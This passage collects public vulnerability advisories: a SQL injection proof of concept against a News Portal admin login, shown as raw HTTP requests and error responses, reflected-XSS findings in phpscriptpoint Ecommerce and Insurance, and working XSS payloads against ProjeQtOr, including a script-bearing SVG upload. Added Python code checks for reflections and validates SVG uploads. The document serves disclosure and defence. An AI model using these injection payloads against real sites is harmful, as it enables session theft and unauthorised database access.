text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br 
/>Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/newsportal/admin/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8<br />Connection: close<br /><br />username=admin'&password=Test%40123&login=<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 11:00:53 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 505<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><br /><br /><b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 
'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13<br />Stack trace:<br />#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')<br />#1 {main}<br /> thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /newsportal/admin/ HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 43<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/newsportal/admin/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; 
stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8<br />Connection: close<br /><br />username=admin''&password=Test%40123&login=<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sun, 09 Jul 2023 11:02:15 GMT<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17<br />X-Powered-By: PHP/8.1.17<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 4733<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><script>alert('Invalid Details');</script><br /><!DOCTYPE html><br /><html lang="en"><br /> <head><br /> <meta charset="utf-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <meta name="description" content="News Portal."><br /> <meta name="author" content="PHPGurukul"><br /><br /><br /> <!-- App title --><br /> <title>News Portal | Admin Panel</title><br />[...]<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Ecommerce 1.15 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/ecommerce/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL by email or instant message;<br />when the victim opens it, the injected script runs in the victim's browser and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /ecommerce/blog-single.php<br /><br />GET parameter 'slug' is vulnerable to RXSS<br /><br />https://website/ecommerce/blog-single.php?slug=[XSS]<br /><br /><br />Path: /ecommerce/product.php<br /><br />GET parameter 'id' is vulnerable to RXSS<br /><br />https://website/ecommerce/product.php?id=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Insurance 1.2 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/insurance/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL by email or instant message;<br />when the victim opens it, the injected script runs in the victim's browser and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br /><br />Path: /insurance/page.php<br /><br />The URL path following the script name (page.php/[XSS]) is reflected and vulnerable to RXSS<br /><br />https://website/insurance/page.php/[XSS]?slug=blog&page=3<br /><br /><br />Path: /insurance/search.php<br /><br />The URL path following the script name (search.php/[XSS]) is reflected and vulnerable to RXSS<br /><br />https://website/insurance/search.php/[XSS]?search_string=&page=3<br /><br /><br />[-] Done<br /></code></pre>
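A quick way to confirm reflected XSS findings like the two advisories above, whether the payload travels in a query parameter (`slug`, `id`) or in the URL path after the script name (`page.php/[XSS]`, typically echoed from the request URI into a form action or link, which is an assumption since the vendor's source is not on the page), is to send a canary containing markup characters and check how the response echoes it. The function below is an added example, not the vendor's or the advisory author's code: it classifies the reflection of a canary in a response body and is run over constructed sample bodies. Only a raw echo inside HTML is exploitable as-is; an entity-encoded echo is the fixed behaviour.

```python
import html
import re
from urllib.parse import quote

# Canary carrying the characters that matter for HTML injection. A real scan
# would randomise the alphanumeric prefix so it cannot collide with page text.
CANARY = 'x7q"><svg/onload=1>'


def reflection_context(body: str, canary: str = CANARY) -> str:
    """Classify how `canary` comes back in `body`.

    'raw'          - echoed verbatim: markup characters survive, XSS confirmed
    'html-encoded' - echoed with < > " & turned into entities: safe in element content
    'url-encoded'  - echoed percent-encoded (e.g. rebuilt into an href): not directly exploitable
    'absent'       - not reflected, or reflected in a form this check does not recognise
    """
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body:
        return "html-encoded"
    if quote(canary, safe="") in body:
        return "url-encoded"
    return "absent"


def find_raw_reflections(body: str, canary: str = CANARY) -> list:
    """Return a short snippet around every raw (unencoded) reflection, for the report."""
    return [body[max(0, m.start() - 30): m.end() + 30]
            for m in re.finditer(re.escape(canary), body)]


# Constructed sample responses (not captured from the vendor demo sites).
SAMPLES = {
    # blog-single.php?slug=<canary> echoed straight into the title and heading
    "vulnerable": f"<title>Blog - {CANARY}</title><h1>{CANARY}</h1>",
    # the same page after wrapping the echo in htmlspecialchars()
    "escaped": f"<title>Blog - {html.escape(CANARY)}</title>",
    # canary re-emitted inside a link target, percent-encoded by the app
    "in_href": f'<a href="/ecommerce/product.php?id={quote(CANARY, safe="")}">next</a>',
    "unrelated": "<title>Not found</title>",
}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:11} -> {reflection_context(body)}")
        for snippet in find_raw_reflections(body):
            print("    raw at:", snippet)
```

The check deliberately treats a percent-encoded echo as "not directly exploitable" rather than safe: if that href is later decoded and written into the DOM by client-side code, it becomes a DOM XSS sink and needs its own test.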
<pre><code>Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS<br />Version: V10.4.1<br />Bugs: Multiple XSS<br />Technology: PHP<br />Vendor URL: https://www.projeqtor.org<br />Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download<br />Date found: 09.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br /><br />2. Technical Details & POC<br /><br /> ### XSS-1 ### <br /><br /><br />visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=<br />payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E<br /><br /> ### XSS-2 ###<br /><br />steps: <br /><br />1. log in to an account<br />2. go to Projects and create a project<br />3. add an attachment<br />4. upload the following SVG file<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br />5. 
open the uploaded SVG file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg ); the embedded script runs and the alert fires<br /><br /><br /> ### XSS-3 ###<br /><br />Send the POST request below; the resultAck body parameter is reflected into the response:<br /><br />POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1<br />Host: localhost<br />Content-Length: 35<br />sec-ch-ua: <br />Content-Type: application/x-www-form-urlencoded<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />sec-ch-ua-platform: ""<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/projeqtor/view/main.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3<br />Connection: close<br /><br />resultAck=<script>alert(4)</script><br /><br /></code></pre>
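XSS-2 works because the attachment is stored and then served back from the application's own origin (`/projeqtor/files/attach/...`) in a way the browser renders as SVG, so the `<script>` inside it runs with the logged-in user's session. The validator below is an added example, not ProjeQtOr's code: it parses an uploaded SVG with the standard library and rejects active content (script and foreignObject elements, animation elements that can rewrite attributes, `on*` event-handler attributes, and `javascript:`/`vbscript:`/`data:` link targets), checked against the advisory's own SVG above and against constructed benign and malicious samples. `xml.etree` does not fetch the external DTD named in the DOCTYPE; for fully untrusted input, pair it with defusedxml to cover entity-expansion attacks as well.

```python
import xml.etree.ElementTree as ET

# Local names are compared lower-cased because SVG embedded in HTML is parsed
# case-insensitively, so <SCRIPT> or onLoad must be caught too.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "set", "animate"}
# data: is blocked as a strict choice (it can carry HTML/SVG); relax it if
# inline data: images are a legitimate need.
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


def _local(name: str) -> str:
    # Strip the {namespace} prefix ElementTree puts on qualified names, e.g.
    # "{http://www.w3.org/1999/xlink}href" -> "href".
    return name.rsplit("}", 1)[-1].lower()


def check_svg(data: bytes):
    """Return (accepted, reason). Accept only SVG that carries no active content."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if _local(root.tag) != "svg":
        return False, f"root element is <{_local(root.tag)}>, not <svg>"
    for el in root.iter():  # root.iter() includes the root element itself
        tag = _local(el.tag)
        if tag in FORBIDDEN_ELEMENTS:
            return False, f"forbidden element <{tag}>"
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                return False, f"event handler attribute {name} on <{tag}>"
            if name == "href" and value.strip().lower().startswith(DANGEROUS_SCHEMES):
                return False, f"href with active scheme on <{tag}>"
    return True, "ok"


# The attachment from the advisory's XSS-2 steps, reproduced verbatim.
ADVISORY_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">
 alert(document.location);
 </script>
</svg>
"""

# Constructed samples (not from the advisory): the same drawing without the
# script, an event handler on the root, and a javascript: link via xlink:href.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg">'
              b'<polygon points="0,0 0,50 50,0" fill="#009900"/></svg>')
HANDLER_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
               b'<rect width="1" height="1"/></svg>')
LINK_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text y="10">x</text></a></svg>')


if __name__ == "__main__":
    for label, sample in [("advisory", ADVISORY_SVG), ("benign", BENIGN_SVG),
                          ("handler", HANDLER_SVG), ("link", LINK_SVG)]:
        print(f"{label:9} -> {check_svg(sample)}")
```

Upload-time validation is defence in depth, not the whole fix: the attachment was exploitable because it is rendered from the application's origin, so uploads should also be served with `Content-Disposition: attachment` (or from a separate, cookie-less origin, or under `Content-Security-Policy: sandbox`) so that anything a validator misses still cannot execute with the user's session.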